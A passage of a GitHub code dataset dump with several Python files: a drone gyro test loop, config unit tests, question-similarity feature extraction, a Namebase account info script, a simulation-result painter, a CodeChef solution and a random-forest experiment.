xs.map(lambda x: (ranks < x).sum())\n cdf = cdf.reindex(xs).fillna(method='ffill')\n # normalize the cdf to percentage\n return cdf / len(ranks)\n\n","repo_name":"jephdo/kaplan-sat-parser","sub_path":"kaplanparse/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40517063209","text":"import imu2 as imu\nimport motors\nimport time\nimport json\nimport matplotlib.pyplot as plt\n\nimport RPi.GPIO as GPIO\nimport board\nimport busio\nimport adafruit_pca9685\ni2c = busio.I2C(board.SCL, board.SDA)\nhat = adafruit_pca9685.PCA9685(i2c)\n\nif __name__ == \"__main__\":\n mpu = imu.mpu6050(0x68)\n hat.frequency = 50\n mpu.set_gyro_range(mpu.GYRO_RANGE_2000DEG)\n\n angles = {'x': 0, 'y': 0}\n errors = {'count': 1030, 'x':1.72, 'y':0.55, 'z':1.34} \n\n rotor0 = motors.Rotor(0, 50)\n rotor1 = motors.Rotor(1, 50)\n rotor2 = motors.Rotor(2, 50)\n rotor3 = motors.Rotor(3, 50)\n\n def constrain(value, minimum, maximum):\n return max(min(maximum, value), minimum)\n\n general_throttle = 50\n p = 10\n\n rotor0.thrust(general_throttle)\n rotor1.thrust(general_throttle)\n rotor2.thrust(general_throttle)\n rotor3.thrust(general_throttle)\n\n readTimeAvg = 0\n run_time = 20\n counter = 0\n moAvg1 = 0\n moAvg2 = 0\n gyro_read = {'x':0, 'y':0, 'z':0}\n t1 = time.time()\n x_arr = []\n axis_x_arr = []\n axis_y_arr = []\n prev = 1\n t6 = time.time()\n\n d_x = 0\n d_y = 0\n t5 = time.time()\n\n while time.time()-t5 < run_time:\n t3 = time.time()\n gyro_read['x'] = mpu.get_gyro_data()['x']-errors['x']\n gyro_read['y'] = mpu.get_gyro_data()['y']-errors['y']\n readTimeAvg += time.time()-t3\n\n rotor0.thrust(general_throttle+gyro_read['x'])\n rotor1.thrust(general_throttle-gyro_read['x'])\n rotor2.thrust(general_throttle+gyro_read['y'])\n rotor3.thrust(general_throttle-gyro_read['y'])\n counter += 1\n x_arr.append(counter)\n axis_x_arr.append(gyro_read['x'])\n axis_y_arr.append(gyro_read['y'])\n\n print(\"Loop Frequency:\", counter/run_time)\n print(\"Read Time Average:\", readTimeAvg/counter)\n rotor0.thrust(0)\n rotor1.thrust(0)\n rotor2.thrust(0)\n rotor3.thrust(0)\n plt.plot(x_arr, axis_x_arr)\n 
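# overlay the y-axis gyro trace on the same figure for comparison\n 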
plt.plot(x_arr, axis_y_arr)\n plt.show()","repo_name":"RichardWessels/DroneFlightSystem","sub_path":"dfs_func/stopAngularRotAll.py","file_name":"stopAngularRotAll.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6442593799","text":"from imports import *\nfrom mock import mock_open, call\nimport yaml\nfrom StringIO import StringIO\n\nfrom ngs_mapper import config\n\nclass Base(common.BaseClass):\n modulepath = 'ngs_mapper.config'\n\n def setUp(self):\n super(Base,self).setUp()\n\n self.config = {\n 'NGSDATA': self.tempdir,\n 'base_caller': {\n 'bias': {\n 'default': 10\n }\n }\n }\n\n def _create_yaml_from_config(self, config):\n import yaml\n return yaml.dump(config)\n\n@patch('ngs_mapper.config.yaml', autospec=True)\nclass TestLoadConfigFile(Base):\n functionname = 'load_config'\n\n def test_loads_config_stream(self, mock_yaml):\n mock_yaml.load.return_value = self.config\n config_stream = mock_open(read_data=self._create_yaml_from_config(self.config))()\n r = self._C(config_stream)\n eq_(self.tempdir, r['NGSDATA'])\n\n def test_loads_config_filepath(self, mock_yaml):\n mock_yaml.load.return_value = self.config\n with patch('__builtin__.open') as mock_open:\n r = self._C('/path/to/file.yaml')\n eq_(self.tempdir, r['NGSDATA'])\n mock_open.assert_called_once_with('/path/to/file.yaml')\n mock_yaml.load.assert_called_once_with(mock_open())\n\n @patch('__builtin__.open', Mock())\n def test_invalid_config_raises_exception(self, mock_yaml):\n self.config['NGSDATA'] = '/missing/path'\n mock_yaml.load.return_value = self.config\n from ngs_mapper.config import InvalidConfigError\n assert_raises(InvalidConfigError, self._C, '/path/to/file.yaml')\n\n @attr('current')\n @patch('__builtin__.open', Mock())\n def test_returns_config_class_instance(self, mock_yaml):\n from ngs_mapper.config import Config\n mock_yaml.load.return_value = self.config\n r = self._C('/path/to/my.yaml')\n assert isinstance(r, Config), 'not instance of Config'\n\n@attr('current')\nclass TestConfigClass(Base):\n def setUp(self):\n super(TestConfigClass,self).setUp()\n self.config = {\n 'foo': 'bar'\n }\n self.inst = config.Config(self.config)\n\n def test_returns_values_from_getitem(self):\n eq_('bar', self.inst['foo'])\n\n def test_returns_values_from_attributes(self):\n eq_('bar', self.inst.foo)\n\n def test_raises_exception_missing_value_attribute(self):\n self.inst.yaml = {}\n assert_raises(config.InvalidConfigError, self.inst.__getattr__, 'foo')\n\n def test_raises_exception_missing_value_getitem(self):\n self.inst.yaml = {}\n assert_raises(config.InvalidConfigError, self.inst.__getitem__, 'foo')\n\nclass TestVerifyConfig(Base):\n functionname = 'verify_config'\n\n def test_bias_value_lt_1_raises_error(self):\n from ngs_mapper.config import InvalidConfigError\n self.config['base_caller']['bias']['default'] = 0\n assert_raises(InvalidConfigError, self._C, self.config)\n\n def test_ngsdata_not_set_raises_error(self):\n from ngs_mapper.config import InvalidConfigError\n self.config['NGSDATA'] = '/non/existant/path'\n assert_raises(InvalidConfigError, self._C, self.config)\n\n def test_valid_config_no_error(self):\n self.config['NGSDATA'] = self.tempdir\n self._C(self.config)\n\n@patch('__builtin__.open', Mock())\n@patch('pkg_resources.resource_stream')\n@patch('ngs_mapper.config.yaml')\nclass TestLoadDefaultConfig(Base):\n functionname = 'load_default_config'\n\n def test_loads_from_pkg_resources(self, mock_yaml, 
mock_stream):\n mock_stream.return_value = mock_open(read_data=self._create_yaml_from_config(self.config))()\n mock_yaml.load.return_value = self.config\n r = self._C()\n eq_(self.tempdir, r['NGSDATA'])\n\n@patch('ngs_mapper.config.yaml')\n@patch('__builtin__.open', MagicMock())\nclass TestMakeExampleConfig(Base):\n functionname = 'make_example_config'\n\n def test_invalid_savepath_raises_exception(self, mock_yaml):\n assert_raises(ValueError, self._C, '/non/existant/path.yaml')\n\n def test_makes_config_cwd_is_default(self, mock_yaml):\n from ngs_mapper.config import load_config\n mock_yaml.load.return_value = self.config\n r = self._C()\n config = load_config(r)\n eq_(self.tempdir,config['NGSDATA'])\n\n def test_makes_config_to_specified_path(self, mock_yaml):\n from ngs_mapper.config import load_config\n mock_yaml.load.return_value = self.config\n os.mkdir('configdir')\n savepath = join('configdir', 'config.yaml')\n r = self._C(savepath)\n config = load_config(r)\n eq_(self.tempdir,config['NGSDATA'])\n eq_(r, savepath)\n\n@patch('ngs_mapper.config.yaml')\n@patch('__builtin__.open', MagicMock())\nclass TestGetConfigArgparse(Base):\n functionname = 'get_config_argparse'\n\n def test_outputs_version(self, mock_yaml):\n mock_yaml.load.return_value = self.config\n with patch('ngs_mapper.config.sys') as msys:\n with patch('ngs_mapper.config.ngs_mapper') as mngs_mapper:\n mngs_mapper.__version__ = '1.1.1'\n msys.stdout = StringIO()\n r = self._C(['--version'])\n eq_('Version 1.1.1\\n', msys.stdout.getvalue())\n\n def test_does_not_parse_help(self, mock_yaml):\n mock_yaml.load.return_value = self.config\n r = self._C(['--help'])\n parser, args, config, configfile = r\n ok_('--help' in args, 'Parsed --help when it should not have')\n \n def test_returns_valid_argparse(self, mock_yaml):\n mock_yaml.load.return_value = self.config\n from argparse import ArgumentParser\n r = self._C(['--foo', 'foo'])\n parser, args, config, configfile = r\n parser = ArgumentParser(parents=[parser])\n parser.add_argument('--foo')\n args = parser.parse_args(args)\n eq_(args.foo, 'foo')\n\n def test_returns_default_config(self, mock_yaml):\n mock_yaml.load.return_value = self.config\n r = self._C([])\n parser, args, config, configfile = r\n eq_(self.tempdir, config['NGSDATA'])\n eq_(configfile, None)\n\n def test_returns_specified_config(self, mock_yaml):\n mock_yaml.load.return_value = self.config\n with patch('ngs_mapper.config.load_config') as mock_load_config:\n r = self._C(['-c','/path/to/file.yaml'])\n parser, args, config, configfile = r\n mock_load_config.assert_called_once_with('/path/to/file.yaml')\n eq_('/path/to/file.yaml', configfile)\n\n@patch('__builtin__.open')\n@patch('ngs_mapper.config.yaml')\n@patch('argparse.ArgumentParser.parse_args')\nclass TestMain(Base):\n functionname = 'main'\n\n def test_creates_config(self,mock_parse_args, mock_yaml, mock_open):\n curconfigpath = join(self.tempdir, 'my.yaml')\n mock_yaml.load.return_value = self.config\n parse_args = Mock()\n parse_args.save_to = curconfigpath\n mock_parse_args.return_value = parse_args\n\n import StringIO\n stdout = StringIO.StringIO()\n with patch('sys.stdout', stdout):\n self._C()\n # Make sure script outputs path to config created\n eq_(curconfigpath, stdout.getvalue().rstrip())\n","repo_name":"VDBWRAIR/ngs_mapper","sub_path":"ngs_mapper/tests/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":7268,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} 
+{"seq_id":"30221142005","text":"import re\n\nimport distance\nimport nltk\nfrom bs4 import BeautifulSoup\nfrom fuzzywuzzy import fuzz\nfrom nltk.corpus import stopwords\n\n\nclass Preprocessing:\n def __init__(self):\n nltk.download(\"stopwords\")\n nltk.download(\"averaged_perceptron_tagger\")\n\n def get_token_features(self, q1, q2):\n\n safe_div = 0.0001\n\n stop_words = stopwords.words(\"english\")\n\n stop_words.append(\"difference\")\n stop_words.append(\"different\")\n stop_words.append(\"best\")\n\n token_features = [0.0] * 14\n\n q1 = q1.split()\n q2 = q2.split()\n\n q1_stops = set([word for word in q1 if word in stop_words])\n q2_stops = set([word for word in q2 if word in stop_words])\n common_stops = q1_stops & q2_stops\n\n q1 = [word for word in q1 if word not in stop_words]\n q2 = [word for word in q2 if word not in stop_words]\n\n q1_stemmed = \" \".join([word for word in q1])\n q2_stemmed = \" \".join([word for word in q2])\n\n if len(q1) == 0 or len(q2) == 0:\n return (token_features, q1_stemmed, q2_stemmed)\n\n q1_tagged = nltk.pos_tag(q1)\n q2_tagged = nltk.pos_tag(q2)\n\n q1_adj = set()\n q2_adj = set()\n q1_prn = set()\n q2_prn = set()\n q1_n = set()\n q2_n = set()\n\n for word in q1_tagged:\n if word[1] == \"JJ\" or word[1] == \"JJR\" or word[1] == \"JJS\":\n q1_adj.add(word[0])\n elif word[1] == \"NNP\" or word[1] == \"NNPS\":\n q1_prn.add(word[0])\n elif word[1] == \"NN\" or word[1] == \"NNS\":\n q1_n.add(word[0])\n\n for word in q2_tagged:\n if word[1] == \"JJ\" or word[1] == \"JJR\" or word[1] == \"JJS\":\n q2_adj.add(word[0])\n elif word[1] == \"NNP\" or word[1] == \"NNPS\":\n q2_prn.add(word[0])\n elif word[1] == \"NN\" or word[1] == \"NNS\":\n q2_n.add(word[0])\n\n q1 = set(q1)\n q2 = set(q2)\n common_tokens = q1 & q2\n\n q1_words = set(q1)\n q2_words = set(q2)\n common_words = q1_words & q2_words\n\n # Features: counter tokens\n token_features[0] = len(q1) * 1.0\n token_features[1] = len(q2) * 1.0\n token_features[2] = len(q1_stemmed) * 1.0\n token_features[3] = len(q2_stemmed) * 1.0\n token_features[4] = len(common_words) * 1.0\n token_features[5] = len(q1_adj & q2_adj)\n token_features[6] = len(q1_prn & q2_prn)\n token_features[7] = len(q1_n & q2_n)\n\n # Features: proportions tokens\n token_features[8] = (len(common_stops) * 1.0) / (\n min(len(q1_stops), len(q2_stops)) + safe_div\n )\n token_features[9] = (len(common_stops) * 1.0) / (\n max(len(q1_stops), len(q2_stops)) + safe_div\n )\n token_features[10] = (len(common_tokens) * 1.0) / (\n min(len(q1), len(q2)) + safe_div\n )\n token_features[11] = (len(common_tokens) * 1.0) / (\n max(len(q1), len(q2)) + safe_div\n )\n\n # Features: conditional tokens\n token_features[12] = int(q1[0] == q2[0])\n token_features[13] = int(q1[-1] == q2[-1])\n\n return (token_features, q1_stemmed, q2_stemmed)\n\n def get_fuzzy_features(self, q1, q2):\n\n fuzzy_features = [0.0] * 3\n\n fuzzy_features[0] = fuzz.partial_ratio(q1, q2)\n fuzzy_features[1] = fuzz.token_sort_ratio(q1, q2)\n fuzzy_features[2] = fuzz.token_set_ratio(q1, q2)\n\n return fuzzy_features\n\n def get_length_features(self, q1, q2):\n\n safe_div = 0.0001\n\n length_features = [0.0] * 4\n\n q1_list = q1.strip(\" \")\n q2_list = q2.strip(\" \")\n\n length_features[0] = (len(q1_list) + len(q2_list)) / 2\n length_features[1] = (len(q1_list) + len(q2_list)) / 2\n substr_len = distance.lcsubstrings(q1, q2, positions=True)[0]\n if substr_len == 0:\n length_features[2] = 0\n else:\n length_features[2] = substr_len / (\n min(len(q1_list), len(q2_list)) + safe_div\n )\n 
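# feature 3: absolute difference in character count between the two questions\n 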
length_features[3] = abs(len(q1_list) - len(q2_list))\n\n return length_features\n\n def extract_features(self, data):\n\n data[\"question1\"] = data[\"question1\"].apply(self.preprocess)\n data[\"question2\"] = data[\"question2\"].apply(self.preprocess)\n\n token_features = data.apply(\n lambda x: self.get_token_features(x[\"question1\"], x[\"question2\"]), axis=1\n )\n\n q1_stemmed = list(map(lambda x: x[1], token_features))\n q2_stemmed = list(map(lambda x: x[2], token_features))\n token_features = list(map(lambda x: x[0], token_features))\n\n # Features: counter tokens\n data[\"question1\"] = q1_stemmed\n data[\"question2\"] = q2_stemmed\n data[\"len_question1\"] = list(map(lambda x: x[0], token_features))\n data[\"len_question2\"] = list(map(lambda x: x[1], token_features))\n data[\"words_question1\"] = list(map(lambda x: x[2], token_features))\n data[\"words_question2\"] = list(map(lambda x: x[3], token_features))\n data[\"mutual_words\"] = list(map(lambda x: x[4], token_features))\n data[\"count_mutual_adjective\"] = list(map(lambda x: x[5], token_features))\n data[\"count_mutual_proper_name\"] = list(map(lambda x: x[6], token_features))\n data[\"count_mutual_noun\"] = list(map(lambda x: x[7], token_features))\n\n # Features: proportions tokens\n data[\"ratio_min_stop_words_question\"] = list(\n map(lambda x: x[8], token_features)\n )\n data[\"ratio_max_stop_words_question\"] = list(\n map(lambda x: x[9], token_features)\n )\n data[\"ratio_min_stop_words\"] = list(map(lambda x: x[10], token_features))\n data[\"ratio_max_stop_words\"] = list(map(lambda x: x[11], token_features))\n\n # Features: conditional tokens\n data[\"first_token_equals\"] = list(map(lambda x: x[12], token_features))\n data[\"last_token_equals\"] = list(map(lambda x: x[13], token_features))\n\n # Features: token length\n length_features = data.apply(\n lambda x: self.get_length_features(x[\"question1\"], x[\"question2\"]), axis=1\n )\n data[\"len_mean\"] = list(map(lambda x: x[0], length_features))\n data[\"len_median\"] = list(map(lambda x: x[1], length_features))\n data[\"ratio_max_min\"] = list(map(lambda x: x[2], length_features))\n data[\"absolute_difference\"] = list(map(lambda x: x[3], length_features))\n\n # Features: token fuzzy\n fuzzy_features = data.apply(\n lambda x: self.get_fuzzy_features(x[\"question1\"], x[\"question2\"]), axis=1\n )\n data[\"ratio_fuzz_partial\"] = list(map(lambda x: x[0], fuzzy_features))\n data[\"ratio_sort_token\"] = list(map(lambda x: x[1], fuzzy_features))\n data[\"ratio_set_token\"] = list(map(lambda x: x[2], fuzzy_features))\n\n return data\n\n def preprocess(self, q):\n\n q = str(q).lower().strip()\n\n q = q.replace(\"%\", \" percent\")\n q = q.replace(\"$\", \" dollar \")\n q = q.replace(\"₹\", \" rupee \")\n q = q.replace(\"€\", \" euro \")\n q = q.replace(\"@\", \" at \")\n\n q = q.replace(\"[math]\", \"\")\n\n q = q.replace(\",000,000,000 \", \"b \")\n q = q.replace(\",000,000 \", \"m \")\n q = q.replace(\",000 \", \"k \")\n q = re.sub(r\"([0-9]+)000000000\", r\"\\1b\", q)\n q = re.sub(r\"([0-9]+)000000\", r\"\\1m\", q)\n q = re.sub(r\"([0-9]+)000\", r\"\\1k\", q)\n\n contractions = {\n \"ain't\": \"am not\",\n \"aren't\": \"are not\",\n \"can't\": \"can not\",\n \"can't've\": \"can not have\",\n \"'cause\": \"because\",\n \"could've\": \"could have\",\n \"couldn't\": \"could not\",\n \"couldn't've\": \"could not have\",\n \"didn't\": \"did not\",\n \"doesn't\": \"does not\",\n \"don't\": \"do not\",\n \"hadn't\": \"had not\",\n \"hadn't've\": \"had not have\",\n 
\"hasn't\": \"has not\",\n \"haven't\": \"have not\",\n \"he'd\": \"he would\",\n \"he'd've\": \"he would have\",\n \"he'll\": \"he will\",\n \"he'll've\": \"he will have\",\n \"he's\": \"he is\",\n \"how'd\": \"how did\",\n \"how'd'y\": \"how do you\",\n \"how'll\": \"how will\",\n \"how's\": \"how is\",\n \"i'd\": \"i would\",\n \"i'd've\": \"i would have\",\n \"i'll\": \"i will\",\n \"i'll've\": \"i will have\",\n \"i'm\": \"i am\",\n \"i've\": \"i have\",\n \"isn't\": \"is not\",\n \"it'd\": \"it would\",\n \"it'd've\": \"it would have\",\n \"it'll\": \"it will\",\n \"it'll've\": \"it will have\",\n \"it's\": \"it is\",\n \"let's\": \"let us\",\n \"ma'am\": \"madam\",\n \"mayn't\": \"may not\",\n \"might've\": \"might have\",\n \"mightn't\": \"might not\",\n \"mightn't've\": \"might not have\",\n \"must've\": \"must have\",\n \"mustn't\": \"must not\",\n \"mustn't've\": \"must not have\",\n \"needn't\": \"need not\",\n \"needn't've\": \"need not have\",\n \"o'clock\": \"of the clock\",\n \"oughtn't\": \"ought not\",\n \"oughtn't've\": \"ought not have\",\n \"shan't\": \"shall not\",\n \"sha'n't\": \"shall not\",\n \"shan't've\": \"shall not have\",\n \"she'd\": \"she would\",\n \"she'd've\": \"she would have\",\n \"she'll\": \"she will\",\n \"she'll've\": \"she will have\",\n \"she's\": \"she is\",\n \"should've\": \"should have\",\n \"shouldn't\": \"should not\",\n \"shouldn't've\": \"should not have\",\n \"so've\": \"so have\",\n \"so's\": \"so as\",\n \"that'd\": \"that would\",\n \"that'd've\": \"that would have\",\n \"that's\": \"that is\",\n \"there'd\": \"there would\",\n \"there'd've\": \"there would have\",\n \"there's\": \"there is\",\n \"they'd\": \"they would\",\n \"they'd've\": \"they would have\",\n \"they'll\": \"they will\",\n \"they'll've\": \"they will have\",\n \"they're\": \"they are\",\n \"they've\": \"they have\",\n \"to've\": \"to have\",\n \"wasn't\": \"was not\",\n \"we'd\": \"we would\",\n \"we'd've\": \"we would have\",\n \"we'll\": \"we will\",\n \"we'll've\": \"we will have\",\n \"we're\": \"we are\",\n \"we've\": \"we have\",\n \"weren't\": \"were not\",\n \"what'll\": \"what will\",\n \"what'll've\": \"what will have\",\n \"what're\": \"what are\",\n \"what's\": \"what is\",\n \"what've\": \"what have\",\n \"when's\": \"when is\",\n \"when've\": \"when have\",\n \"where'd\": \"where did\",\n \"where's\": \"where is\",\n \"where've\": \"where have\",\n \"who'll\": \"who will\",\n \"who'll've\": \"who will have\",\n \"who's\": \"who is\",\n \"who've\": \"who have\",\n \"why's\": \"why is\",\n \"why've\": \"why have\",\n \"will've\": \"will have\",\n \"won't\": \"will not\",\n \"won't've\": \"will not have\",\n \"would've\": \"would have\",\n \"wouldn't\": \"would not\",\n \"wouldn't've\": \"would not have\",\n \"y'all\": \"you all\",\n \"y'all'd\": \"you all would\",\n \"y'all'd've\": \"you all would have\",\n \"y'all're\": \"you all are\",\n \"y'all've\": \"you all have\",\n \"you'd\": \"you would\",\n \"you'd've\": \"you would have\",\n \"you'll\": \"you will\",\n \"you'll've\": \"you will have\",\n \"you're\": \"you are\",\n \"you've\": \"you have\",\n }\n\n q_decontracted = []\n\n for word in q.split():\n if word in contractions:\n word = contractions[word]\n\n q_decontracted.append(word)\n\n q = \" \".join(q_decontracted)\n q = q.replace(\"'ve\", \" have\")\n q = q.replace(\"n't\", \" not\")\n q = q.replace(\"'re\", \" are\")\n q = q.replace(\"'ll\", \" will\")\n\n q = BeautifulSoup(q)\n q = q.get_text()\n\n pattern = re.compile(\"\\W\")\n q = 
re.sub(pattern, \" \", q).strip()\n\n return q\n","repo_name":"modestoo/mdm_mestrado","sub_path":"src/preproc/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":12302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21986161452","text":"'''\nCreated on 11 ago. 2017\n\n@author: Administrador\n'''\nimport glob\nimport sys\nfrom squareGeometryMatrix import squareGeometryMatrix\nfrom triangleGeometryMatrix import triangleGeometryMatrix\n\nfrom Individual import Individual\nfrom Chromosome import Chromosome\n\n\n#files = glob.glob( 'results/*.txt' )\nfiles = glob.glob(sys.argv[1])\nfor myFile in files:\n print (\"painting file \" + myFile)\n f = open(myFile,'r')\n a = f.readlines()\n\n multiplicity = int(a[6].split(':')[1])\n geometry = a[7].split(':')[1].strip()\n xSize = int(a[8].split(':')[1])\n ySize = int(a[9].split(':')[1])\n energy = float(a[11].split(':')[1])\n\n if geometry==\"square\":\n geometry = squareGeometryMatrix(xSize, ySize, multiplicity)\n else:\n geometry = triangleGeometryMatrix(xSize, multiplicity)\n\n chromosomeList=[]\n for line in a[14:]:\n try:\n newChromosome = Chromosome(int(line.split()[0]), int(line.split()[1]), 1)\n chromosomeList.append(newChromosome)\n except:\n pass\n\n numpyAnclajeList = geometry.getAnclajesListNumpy()\n myindividual = Individual(geometry, numpyAnclajeList, False, False, 1)\n myindividual.chromosomes = chromosomeList\n myindividual.besselValue = energy\n\n outputFileName = myFile[:-4] + \".png\"\n myindividual.paint(outputFileName)\n print (\" OK DONE\")\n","repo_name":"ciemat-tic/DiVoS","sub_path":"paintResults.py","file_name":"paintResults.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43128195009","text":"import requests\nimport json\nimport os\nfrom colorama import init, Fore, Back, Style\nimport time\n\ninit(convert=True)\n\ncolors = [\n Fore.RED,\n Fore.YELLOW,\n Fore.GREEN,\n Fore.CYAN,\n Fore.BLUE,\n Fore.MAGENTA\n ]\n\nendpoint = \"https://www.namebase.io\"\n\npName = Fore.BLUE + \"--- Namebase Extended ---\" + Style.RESET_ALL\n\ndef cClear():\n os.system('cls' if os.name == 'nt' else 'clear')\n\ndef main(cookies):\n cClear()\n\n confirm = input(Fore.GREEN + \"This command returns very sensitive data, only continue if you are not in a public area. 
(y/n): \" + Style.RESET_ALL).lower()\n\n if confirm.lower() == \"y\":\n pass\n else: \n print(Fore.RED + \"Aborting...\" + Style.RESET_ALL)\n return\n\n cClear()\n\n r = requests.get(endpoint + \"/api/user\", cookies={\"namebase-main\": cookies}).json()\n\n print(Fore.CYAN + \"Email: \" + Fore.WHITE + Style.BRIGHT + str(r['email']))\n print(Fore.CYAN + \"UUID: \" + Fore.WHITE + Style.BRIGHT + str(r['segmentUuid']))\n print(Fore.CYAN + \"HNS Balance: \" + Fore.WHITE + Style.BRIGHT + str(float(r['hns_balance']) / 1000000) + \" HNS\")\n if r['verificationStatus'].lower() == \"verified\":\n print(Fore.CYAN + \"Verified: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Verified: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canLinkBank'] == True:\n print(Fore.CYAN + \"Can Link Bank: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Can Link Bank: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canDepositHns'] == True:\n print(Fore.CYAN + \"Can Deposit HNS: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Can Deposit HNS: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canDepositBtc'] == True:\n print(Fore.CYAN + \"Can Deposit BTC: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Can Deposit BTC: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canDepositUsd'] == True:\n print(Fore.CYAN + \"Can Deposit USD: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Can Deposit USD: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canWithdrawHns'] == True:\n print(Fore.CYAN + \"Can Withdraw HNS: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\") \n else:\n print(Fore.CYAN + \"Can Withdraw HNS: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canWithdrawBtc'] == True:\n print(Fore.CYAN + \"Can Withdraw BTC: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Can Withdraw BTC: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canWithdrawUsd'] == True:\n print(Fore.CYAN + \"Can Withdraw USD: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Can Withdraw USD: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canUseProExchange'] == True:\n print(Fore.CYAN + \"Can Use Pro Exchange: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Can Use Pro Exchange: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canUseConsumerHnsBtc'] == True:\n print(Fore.CYAN + \"Can Exchange HNS/BTC: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Can Exchange HNS/BTC: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['canUseConsumerBtcHns'] == True:\n print(Fore.CYAN + \"Can Exchange BTC/HNS: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Can Exchange BTC/HNS: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n if r['isNewYork'] == True:\n print(Fore.CYAN + \"Is New York: \" + Fore.GREEN + Style.BRIGHT + \"TRUE\")\n else:\n print(Fore.CYAN + \"Is New York: \" + Fore.RED + Style.BRIGHT + \"FALSE\")\n print(Fore.CYAN + \"Full Name: \" + Style.BRIGHT + str(r['fullName']))\n print(Fore.CYAN + \"Referral Code: \" + Style.BRIGHT + str(r['referralCode']))\n\n\n cont = input(Fore.GREEN + \"Press enter to continue. 
\" + Style.RESET_ALL).lower()","repo_name":"RunDavidMC/Namebase-Extended","sub_path":"userinfo.py","file_name":"userinfo.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"31"} +{"seq_id":"25280669010","text":"import sys\nsys.stdout = open('./output.txt', 'w')\nsys.stdin = open('./input.txt', 'r')\n\n\ndef answer_finder():\n values = input().split()\n dis = {\n 'R': 1,\n 'B': 2,\n 'G': 3\n }\n if dis[values[0]] < dis[values[1]]:\n print(values[0])\n else:\n print(values[1])\n \n\n\nanswer_finder()\n","repo_name":"naveen701526/Code-Chef-Contest-Problems","sub_path":"0-1000 Beginner Level/GENE01.py","file_name":"GENE01.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13160580883","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sn\nimport matplotlib.pyplot as plt\nimport os\n\nfrom loadData import loadData\n\nfiles = os.listdir('MPIIMobileAttention/')\ndf = loadData(files[0:1])\nprint(files[0:1])\n\n#features.head()\n\n\ndf = df.drop(columns=['trust_screen', 'environment', 'indoor_outdoor','trust_activity',\n 'user_name', 'message', 'app_description','stat_mobile',\n 'screenstatus', 'screenactivity', 'phone_screenonoff_description',\n 'sem_seg','subject_folder','block_folder', 'object_seg', 'question_type'])\n\n#'evironment_1', 'evironment_2', 'evironment_3', 'evironment_4', 'evironment_5', \n\n#df = df.fillna(0)\n\n#df = df.replace([np.inf, -np.inf], np.nan)\n\ndf = df.dropna(axis='columns')\n\ndf = pd.get_dummies(df)\n\nprint(df.head())\n\n\n# print(\"df: \\n\", df)\n# print(df.dtypes)\n\n# print (df)\nX = df.loc[:, df.columns != 'gaze_on_screen']\nX= np.array(X).astype(np.float32)\nprint(X.dtype)\n\n\ny = np.array(df['gaze_on_screen'])\n\n\nprint('X: \\n', X.dtype, X)\nprint('y: \\n',y.dtype, y)\n\nfrom sklearn.model_selection import train_test_split\n\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.25, random_state=0)\n\nfrom sklearn.preprocessing import StandardScaler\n\nscaler = StandardScaler()\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n\nfrom sklearn.ensemble import RandomForestClassifier\n\n#Create a Gaussian Classifier\nclf=RandomForestClassifier(n_estimators=100)\n\n#Train the model using the training sets y_pred=clf.predict(X_test)\nclf.fit(X_train,y_train)\n\nfrom proximityMatrix import proximityMatrix\n\nproxMat = proximityMatrix(clf, X_train, normalize=True)\n\nprint(\"proxMat: \\n\", proxMat)\n\n\n","repo_name":"naitisb/MobileAttentionManifold","sub_path":"randomForest.py","file_name":"randomForest.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37031683923","text":"#!/usr/bin/env python\n# Usage: tcpclient $urchub_addr $urchub_port python urcbot.py\n\nimport liburc\nimport sys\nimport os\nimport re\n\nRE = 'a-zA-Z0-9^(\\)\\-_{\\}[\\]|\\\\\\\\'\nre_PRIVMSG = re.compile('^:['+RE+']+![~:#'+RE+'.]+@[~:#'+RE+'.]+ PRIVMSG 